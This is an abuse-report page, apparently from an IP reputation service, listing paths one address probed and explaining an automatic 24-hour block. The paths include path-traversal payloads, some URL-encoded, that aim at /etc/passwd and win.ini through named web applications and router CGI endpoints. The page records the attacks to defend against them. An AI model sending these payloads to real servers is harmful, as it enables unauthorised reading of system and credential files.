abuseip.org

Sample paths probed

• /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd
• /static/css//../../../../../../../../etc/passwd
• /developLog/downloadLog.php?name=../../../../etc/passwd
• /direct/polling/CommandsPolling.php
• /webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../c:/windows/win.ini
• /WAN_wan.htm?.gif
• /reviewInput.php?pid=1
• /pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd
• /static/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
• /admin/cert_download.php?file=pqpqpqpq.txt&certfile=cert_download.php
• /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1
• /file=C:%5CWindows%5Cwin.ini
• /cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
• /setup.cgi?next_file=debug.htm&x=currentsetting.htm
• /opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
• //netcore_get.cgi
• /css_parser.php?css=css_parser.php
• /ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
• /admin/cert_download.php?file=pqpqpqpq.txt&certfile=../../../../../../../../etc/passwd
• /..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini

Sample User-Agents

• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
• Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0

What does this mean?

This address sent traffic that the redirs.com edge classified as automated abuse — typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).

If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.